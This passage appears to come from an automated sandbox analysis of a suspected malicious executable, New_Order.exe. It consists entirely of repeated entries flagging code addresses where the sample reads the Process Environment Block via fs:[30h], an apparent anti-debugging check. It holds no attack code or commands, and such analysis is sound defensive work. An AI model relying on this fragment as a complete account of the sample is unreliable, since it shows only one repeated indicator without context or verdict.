            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE5CF mov eax, dword ptr fs:[00000030h]10_2_012BE5CF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE5CF mov eax, dword ptr fs:[00000030h]10_2_012BE5CF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012865D0 mov eax, dword ptr fs:[00000030h]10_2_012865D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA5D0 mov eax, dword ptr fs:[00000030h]10_2_012BA5D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA5D0 mov eax, dword ptr fs:[00000030h]10_2_012BA5D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127C427 mov eax, dword ptr fs:[00000030h]10_2_0127C427
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127E420 mov eax, dword ptr fs:[00000030h]10_2_0127E420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127E420 mov eax, dword ptr fs:[00000030h]10_2_0127E420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127E420 mov eax, dword ptr fs:[00000030h]10_2_0127E420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B8402 mov eax, dword ptr fs:[00000030h]10_2_012B8402
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B8402 mov eax, dword ptr fs:[00000030h]10_2_012B8402
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B8402 mov eax, dword ptr fs:[00000030h]10_2_012B8402
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130C460 mov ecx, dword ptr fs:[00000030h]10_2_0130C460
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AA470 mov eax, dword ptr fs:[00000030h]10_2_012AA470
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AA470 mov eax, dword ptr fs:[00000030h]10_2_012AA470
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AA470 mov eax, dword ptr fs:[00000030h]10_2_012AA470
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133A456 mov eax, dword ptr fs:[00000030h]10_2_0133A456
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A245A mov eax, dword ptr fs:[00000030h]10_2_012A245A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127645D mov eax, dword ptr fs:[00000030h]10_2_0127645D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130A4B0 mov eax, dword ptr fs:[00000030h]10_2_0130A4B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012864AB mov eax, dword ptr fs:[00000030h]10_2_012864AB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B44B0 mov ecx, dword ptr fs:[00000030h]10_2_012B44B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133A49A mov eax, dword ptr fs:[00000030h]10_2_0133A49A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012804E5 mov ecx, dword ptr fs:[00000030h]10_2_012804E5
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC720 mov eax, dword ptr fs:[00000030h]10_2_012BC720
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC720 mov eax, dword ptr fs:[00000030h]10_2_012BC720
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B273C mov eax, dword ptr fs:[00000030h]10_2_012B273C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B273C mov ecx, dword ptr fs:[00000030h]10_2_012B273C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B273C mov eax, dword ptr fs:[00000030h]10_2_012B273C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FC730 mov eax, dword ptr fs:[00000030h]10_2_012FC730
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC700 mov eax, dword ptr fs:[00000030h]10_2_012BC700
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280710 mov eax, dword ptr fs:[00000030h]10_2_01280710
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B0710 mov eax, dword ptr fs:[00000030h]10_2_012B0710
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288770 mov eax, dword ptr fs:[00000030h]10_2_01288770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01304755 mov eax, dword ptr fs:[00000030h]10_2_01304755
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B674D mov esi, dword ptr fs:[00000030h]10_2_012B674D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B674D mov eax, dword ptr fs:[00000030h]10_2_012B674D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B674D mov eax, dword ptr fs:[00000030h]10_2_012B674D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130E75D mov eax, dword ptr fs:[00000030h]10_2_0130E75D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280750 mov eax, dword ptr fs:[00000030h]10_2_01280750
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2750 mov eax, dword ptr fs:[00000030h]10_2_012C2750
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2750 mov eax, dword ptr fs:[00000030h]10_2_012C2750
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012807AF mov eax, dword ptr fs:[00000030h]10_2_012807AF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013347A0 mov eax, dword ptr fs:[00000030h]10_2_013347A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132678E mov eax, dword ptr fs:[00000030h]10_2_0132678E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A27ED mov eax, dword ptr fs:[00000030h]10_2_012A27ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A27ED mov eax, dword ptr fs:[00000030h]10_2_012A27ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A27ED mov eax, dword ptr fs:[00000030h]10_2_012A27ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130E7E1 mov eax, dword ptr fs:[00000030h]10_2_0130E7E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012847FB mov eax, dword ptr fs:[00000030h]10_2_012847FB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012847FB mov eax, dword ptr fs:[00000030h]10_2_012847FB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128C7C0 mov eax, dword ptr fs:[00000030h]10_2_0128C7C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013007C3 mov eax, dword ptr fs:[00000030h]10_2_013007C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128262C mov eax, dword ptr fs:[00000030h]10_2_0128262C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B6620 mov eax, dword ptr fs:[00000030h]10_2_012B6620
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B8620 mov eax, dword ptr fs:[00000030h]10_2_012B8620
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E627 mov eax, dword ptr fs:[00000030h]10_2_0129E627
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE609 mov eax, dword ptr fs:[00000030h]10_2_012FE609
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2619 mov eax, dword ptr fs:[00000030h]10_2_012C2619
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA660 mov eax, dword ptr fs:[00000030h]10_2_012BA660
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA660 mov eax, dword ptr fs:[00000030h]10_2_012BA660
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134866E mov eax, dword ptr fs:[00000030h]10_2_0134866E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134866E mov eax, dword ptr fs:[00000030h]10_2_0134866E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B2674 mov eax, dword ptr fs:[00000030h]10_2_012B2674
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129C640 mov eax, dword ptr fs:[00000030h]10_2_0129C640
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC6A6 mov eax, dword ptr fs:[00000030h]10_2_012BC6A6
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B66B0 mov eax, dword ptr fs:[00000030h]10_2_012B66B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284690 mov eax, dword ptr fs:[00000030h]10_2_01284690
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284690 mov eax, dword ptr fs:[00000030h]10_2_01284690
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013006F1 mov eax, dword ptr fs:[00000030h]10_2_013006F1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013006F1 mov eax, dword ptr fs:[00000030h]10_2_013006F1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE6F2 mov eax, dword ptr fs:[00000030h]10_2_012FE6F2
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE6F2 mov eax, dword ptr fs:[00000030h]10_2_012FE6F2
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE6F2 mov eax, dword ptr fs:[00000030h]10_2_012FE6F2
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE6F2 mov eax, dword ptr fs:[00000030h]10_2_012FE6F2
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA6C7 mov ebx, dword ptr fs:[00000030h]10_2_012BA6C7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA6C7 mov eax, dword ptr fs:[00000030h]10_2_012BA6C7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130892A mov eax, dword ptr fs:[00000030h]10_2_0130892A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0131892B mov eax, dword ptr fs:[00000030h]10_2_0131892B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130C912 mov eax, dword ptr fs:[00000030h]10_2_0130C912
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE908 mov eax, dword ptr fs:[00000030h]10_2_012FE908
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE908 mov eax, dword ptr fs:[00000030h]10_2_012FE908
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01278918 mov eax, dword ptr fs:[00000030h]10_2_01278918
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01278918 mov eax, dword ptr fs:[00000030h]10_2_01278918
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C096E mov eax, dword ptr fs:[00000030h]10_2_012C096E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C096E mov edx, dword ptr fs:[00000030h]10_2_012C096E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C096E mov eax, dword ptr fs:[00000030h]10_2_012C096E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A6962 mov eax, dword ptr fs:[00000030h]10_2_012A6962
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A6962 mov eax, dword ptr fs:[00000030h]10_2_012A6962
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A6962 mov eax, dword ptr fs:[00000030h]10_2_012A6962
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01324978 mov eax, dword ptr fs:[00000030h]10_2_01324978
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01324978 mov eax, dword ptr fs:[00000030h]10_2_01324978
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130C97C mov eax, dword ptr fs:[00000030h]10_2_0130C97C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01300946 mov eax, dword ptr fs:[00000030h]10_2_01300946
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013089B3 mov esi, dword ptr fs:[00000030h]10_2_013089B3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013089B3 mov eax, dword ptr fs:[00000030h]10_2_013089B3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013089B3 mov eax, dword ptr fs:[00000030h]10_2_013089B3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012809AD mov eax, dword ptr fs:[00000030h]10_2_012809AD
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012809AD mov eax, dword ptr fs:[00000030h]10_2_012809AD
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A0 mov eax, dword ptr fs:[00000030h]10_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130E9E0 mov eax, dword ptr fs:[00000030h]10_2_0130E9E0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B29F9 mov eax, dword ptr fs:[00000030h]10_2_012B29F9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B29F9 mov eax, dword ptr fs:[00000030h]10_2_012B29F9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134A9D3 mov eax, dword ptr fs:[00000030h]10_2_0134A9D3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013169C0 mov eax, dword ptr fs:[00000030h]10_2_013169C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A9D0 mov eax, dword ptr fs:[00000030h]10_2_0128A9D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A9D0 mov eax, dword ptr fs:[00000030h]10_2_0128A9D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A9D0 mov eax, dword ptr fs:[00000030h]10_2_0128A9D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A9D0 mov eax, dword ptr fs:[00000030h]10_2_0128A9D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A9D0 mov eax, dword ptr fs:[00000030h]10_2_0128A9D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A9D0 mov eax, dword ptr fs:[00000030h]10_2_0128A9D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B49D0 mov eax, dword ptr fs:[00000030h]10_2_012B49D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132483A mov eax, dword ptr fs:[00000030h]10_2_0132483A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132483A mov eax, dword ptr fs:[00000030h]10_2_0132483A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA830 mov eax, dword ptr fs:[00000030h]10_2_012BA830
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A2835 mov eax, dword ptr fs:[00000030h]10_2_012A2835
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A2835 mov eax, dword ptr fs:[00000030h]10_2_012A2835
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A2835 mov eax, dword ptr fs:[00000030h]10_2_012A2835
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A2835 mov ecx, dword ptr fs:[00000030h]10_2_012A2835
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A2835 mov eax, dword ptr fs:[00000030h]10_2_012A2835
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A2835 mov eax, dword ptr fs:[00000030h]10_2_012A2835
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130C810 mov eax, dword ptr fs:[00000030h]10_2_0130C810
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01316870 mov eax, dword ptr fs:[00000030h]10_2_01316870
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01316870 mov eax, dword ptr fs:[00000030h]10_2_01316870
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130E872 mov eax, dword ptr fs:[00000030h]10_2_0130E872
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130E872 mov eax, dword ptr fs:[00000030h]10_2_0130E872
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01292840 mov ecx, dword ptr fs:[00000030h]10_2_01292840
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284859 mov eax, dword ptr fs:[00000030h]10_2_01284859
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284859 mov eax, dword ptr fs:[00000030h]10_2_01284859
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B0854 mov eax, dword ptr fs:[00000030h]10_2_012B0854
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130C89D mov eax, dword ptr fs:[00000030h]10_2_0130C89D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280887 mov eax, dword ptr fs:[00000030h]10_2_01280887
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134A8E4 mov eax, dword ptr fs:[00000030h]10_2_0134A8E4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC8F9 mov eax, dword ptr fs:[00000030h]10_2_012BC8F9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC8F9 mov eax, dword ptr fs:[00000030h]10_2_012BC8F9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE8C0 mov eax, dword ptr fs:[00000030h]10_2_012AE8C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AEB20 mov eax, dword ptr fs:[00000030h]10_2_012AEB20
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AEB20 mov eax, dword ptr fs:[00000030h]10_2_012AEB20
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01348B28 mov eax, dword ptr fs:[00000030h]10_2_01348B28
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01348B28 mov eax, dword ptr fs:[00000030h]10_2_01348B28
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FEB1D mov eax, dword ptr fs:[00000030h]10_2_012FEB1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FEB1D mov eax, dword ptr fs:[00000030h]10_2_012FEB1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FEB1D mov eax, dword ptr fs:[00000030h]10_2_012FEB1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FEB1D mov eax, dword ptr fs:[00000030h]10_2_012FEB1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FEB1D mov eax, dword ptr fs:[00000030h]10_2_012FEB1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FEB1D mov eax, dword ptr fs:[00000030h]10_2_012FEB1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FEB1D mov eax, dword ptr fs:[00000030h]10_2_012FEB1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FEB1D mov eax, dword ptr fs:[00000030h]10_2_012FEB1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FEB1D mov eax, dword ptr fs:[00000030h]10_2_012FEB1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127CB7E mov eax, dword ptr fs:[00000030h]10_2_0127CB7E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132EB50 mov eax, dword ptr fs:[00000030h]10_2_0132EB50
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01328B42 mov eax, dword ptr fs:[00000030h]10_2_01328B42
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01316B40 mov eax, dword ptr fs:[00000030h]10_2_01316B40
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01316B40 mov eax, dword ptr fs:[00000030h]10_2_01316B40
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134AB40 mov eax, dword ptr fs:[00000030h]10_2_0134AB40
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01334B4B mov eax, dword ptr fs:[00000030h]10_2_01334B4B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01334B4B mov eax, dword ptr fs:[00000030h]10_2_01334B4B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01334BB0 mov eax, dword ptr fs:[00000030h]10_2_01334BB0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01334BB0 mov eax, dword ptr fs:[00000030h]10_2_01334BB0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290BBE mov eax, dword ptr fs:[00000030h]10_2_01290BBE
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290BBE mov eax, dword ptr fs:[00000030h]10_2_01290BBE
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130CBF0 mov eax, dword ptr fs:[00000030h]10_2_0130CBF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AEBFC mov eax, dword ptr fs:[00000030h]10_2_012AEBFC
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288BF0 mov eax, dword ptr fs:[00000030h]10_2_01288BF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288BF0 mov eax, dword ptr fs:[00000030h]10_2_01288BF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288BF0 mov eax, dword ptr fs:[00000030h]10_2_01288BF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A0BCB mov eax, dword ptr fs:[00000030h]10_2_012A0BCB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A0BCB mov eax, dword ptr fs:[00000030h]10_2_012A0BCB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A0BCB mov eax, dword ptr fs:[00000030h]10_2_012A0BCB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132EBD0 mov eax, dword ptr fs:[00000030h]10_2_0132EBD0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280BCD mov eax, dword ptr fs:[00000030h]10_2_01280BCD
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280BCD mov eax, dword ptr fs:[00000030h]10_2_01280BCD
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280BCD mov eax, dword ptr fs:[00000030h]10_2_01280BCD
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AEA2E mov eax, dword ptr fs:[00000030h]10_2_012AEA2E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BCA24 mov eax, dword ptr fs:[00000030h]10_2_012BCA24
